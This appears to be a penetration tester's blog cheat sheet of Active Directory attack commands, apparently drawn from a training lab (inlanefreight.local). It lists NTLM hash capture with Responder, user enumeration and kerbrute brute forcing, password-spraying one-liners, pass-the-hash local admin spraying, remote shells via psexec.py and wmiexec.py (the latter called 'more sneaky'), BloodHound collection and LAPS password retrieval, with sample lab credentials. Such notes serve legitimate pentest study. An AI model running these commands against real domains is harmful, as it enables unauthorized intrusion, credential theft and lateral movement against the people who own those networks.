AD Resources

by SoftAndoWetto ~6 min read
resources

Get a list of all devices that are up

nmap -sn [IP]




Capture all network packets on an interface

sudo tcpdump -i [Interface]




Passively listens for Windows name resolution traffic and logs potential NTLM(v1/v2) hashes.

sudo responder -I [Interface] -A




Enumerate users in a domain with SMB NULL (First resort)

crackmapexec smb 172.16.5.5 --users




Enumerate users in a domain with SMB NULL

enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"




Enumerate users in a domain with LDAP anonymous

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "




Brute force a list of potential users in the AD (jsmith.txt is a good wordlist)

kerbrute userenum -d [DOMAIN] --dc [IP] jsmith.txt -o valid_ad_users




Enumerates users, groups, shares, and host info on Windows/AD hosts (Run both with and without credentials)

enum4linux -a -u [USERNAME] -p [PASSWORD] [IP]




Pull the password policy from an AD (With credentials)

crackmapexec smb [IP] -u [USERNAME] -p [PASSWORD] --pass-pol




Enumerate password policy with LDAP

ldapsearch -h [IP] -x -b "DC=[DOMAIN],DC=[DOMAIN EXT]" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength




List all domain users (In Powershell - Requires SYSTEM)

Import-Module .\PowerView.ps1
Get-NetUser




1 Liner password spray [RPCClient] (Requires file with users named valid_users.txt)

for u in $(cat valid_users.txt);do rpcclient -U "$u%[PASSWORD]" -c "getusername;quit" [IP] | grep Authority; done




1 Liner password spray [Kerbrute] (Requires file with users named valid_users.txt)

kerbrute passwordspray -d [DOMAIN] --dc [IP] valid_users.txt  [PASSWORD]




1 Liner password spray [CrackMapExec] (Requires file with users named valid_users.txt)

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +




Local admin spraying (For password reuse across local admin accounts)

sudo crackmapexec smb --local-auth [IP]/[SUBNET] -u administrator -H [HASH] | grep +




Using DomainPasswordSpray for password spraying [Windows] (Requires the Host being joined to the domain)

Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

or

Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList [USERLIST] -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue




Locate the Domain Controller via DNS

nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.local




Locate all DC’s in the domain with their IP or Hostnames

nltest /dclist:domain.local




Returns the DC you are currently authenticated with

echo %logonserver%




NMAP scan to find DC in a given subnet (Less reliable than the others)

nmap -p 88,389,445 -sV [IP]/[SUBNET]




Create a shell on a given host (MUST have admin creds for that host)

psexec.py [DOMAIN]/[USER]:'[Password]'@[IP]




Create a shell on a given host (MUST have admin creds for that host).
More sneaky as there are no files uploaded, and you get Admin rather than SYSTEM

wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5




Queries for all members of the Domain Admins group

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da




Queries for all members of the Privileged Users group

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU




Extracts all data (User sessions, Users, Groups, Object Properties, etc) from a DC

sudo bloodhound-python -u '[USERNAME]' -p '[PASSWORD]' -ns [DC IP] -d [DC] -c all




Enumerating Security Controls

Checking if Windows Defender is active

Get-MpComputerStatus




Check the AppLocker whitelist for blocked executables

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections




Check whether you are in Constrained Language Mode in powershell

$ExecutionContext.SessionState.LanguageMode




Finding which groups have delegated permissions to read LAPS passwords (Anti lateral movement)
Link: LAPS Toolkit

Find-LAPSDelegatedGroups




Finding which groups have all permissions to read LAPS passwords (Anti lateral movement)
Link: LAPS Toolkit

Find-AdmPwdExtendedRights




Returns a list of computers with LAPS enabled (and their passwords if the user has permission)

Get-LAPSComputers




Enumerate users on a Domain Controller

sudo crackmapexec smb [DC IP] -u [USERNAME] -p [PASSWORD] --users




Enumerate groups on a Domain Controller

sudo crackmapexec smb [DC IP] -u [USERNAME] -p [PASSWORD] --groups




Enumerate logged on users on a host

sudo crackmapexec smb [HOST IP] -u [USERNAME] -p [PASSWORD] --loggedon-users




Will list all readable files in a given share

sudo crackmapexec smb [IP] -u [USERNAME] -p [PASSWORD] -M spider_plus --share '[SHARE NAME]'

Results will be written to /tmp/cme_spider_plus/<ip of host>





Related posts


Database Enumeration →

Published on by SoftAndoWetto